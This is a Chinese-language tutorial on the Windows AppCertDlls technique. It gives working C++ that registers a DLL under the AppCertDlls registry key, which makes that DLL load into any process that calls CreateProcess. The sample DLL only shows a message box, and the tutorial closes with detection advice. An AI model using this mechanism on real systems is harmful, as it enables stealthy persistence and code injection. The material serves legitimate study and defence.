代碼及原理介紹
如果有進程使用了CreateProcess、CreateProcessAsUser、CreateProcessWithLoginW、CreateProcessWithTokenW或WinExec
函數,那麼此進程會獲取HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\AppCertDlls註冊表項,此項下的dll都會加載到此進程。
Win7版本下沒有“AppCertDlls”項,需自己創建。
代碼如下:
#include <iostream>
#include <Windows.h>
using namespace std;
int test()
{
DWORD dwDisposition;
HKEY hKey;
const char path[] = "C:\\dll.dll";
RegCreateKeyExA(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCertDlls", 0, NULL, 0, KEY_WRITE, NULL, &hKey, &dwDisposition);
RegSetValueExA(hKey, "Default", 0, REG_SZ, (BYTE*)path, (1 + ::lstrlenA(path)));
return 0;
}
int main()
{
test();
//system("pause");
return 0;
}
Dll代碼:
// dllmain.cpp : 定義 DLL 應用程序的入口點。
#include "stdafx.h"
BOOL TestMutex()
{
HANDLE hMutex = CreateMutexA(NULL, false, "myself");
if (GetLastError() == ERROR_ALREADY_EXISTS)
{
CloseHandle(hMutex);
return 0;
}
return 1;
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH: //進程創建執行
if (TestMutex() == 0)
return TRUE;
MessageBoxA(0, "hello qianxiao996", "AppCert", 0);
case DLL_THREAD_ATTACH: //進=線程創建執行
case DLL_THREAD_DETACH: //進程結束執行
case DLL_PROCESS_DETACH: //線程結束執行
break;
}
return TRUE;
}
復現過程
首先將代碼運行生成EXE和DLL,完整代碼在上面,將DLL文件名改爲dll.dll並放到相應路徑。
然後以管理員運行exe文件,發現已經創建註冊表
下面編寫一個創建進程的測試程序來打開notepad.exe,代碼如下
#include <iostream>
#include <Windows.h>
using namespace std;
int main()
{
STARTUPINFO startupInfo = { 0 };
PROCESS_INFORMATION processInformation = { 0 };
BOOL bSuccess = CreateProcess(TEXT("C:\Windows\System32\notepad.exe"), NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &startupInfo, &processInformation);
if (bSuccess)
{
cout << "Process started." << endl
<< "Process ID:\t"
<< processInformation.dwProcessId << endl;
}
else
{
cout << "Cannot start process!" << endl
<< "Error code:\t" << GetLastError() << endl;
}
return system("pause");
}
當運行測試exe的時候創建了進程,便調用了dll.dll文件,彈出hello qianxiao996窗口。
檢查及清除方法
- 監測dll的加載,特別是查找不是通常的dll,或者不是正常加載的dll。
- 監視AppCertDLL註冊表值
- 監視和分析註冊表編輯的API調用,如RegCreateKeyEx和RegSetValueEx。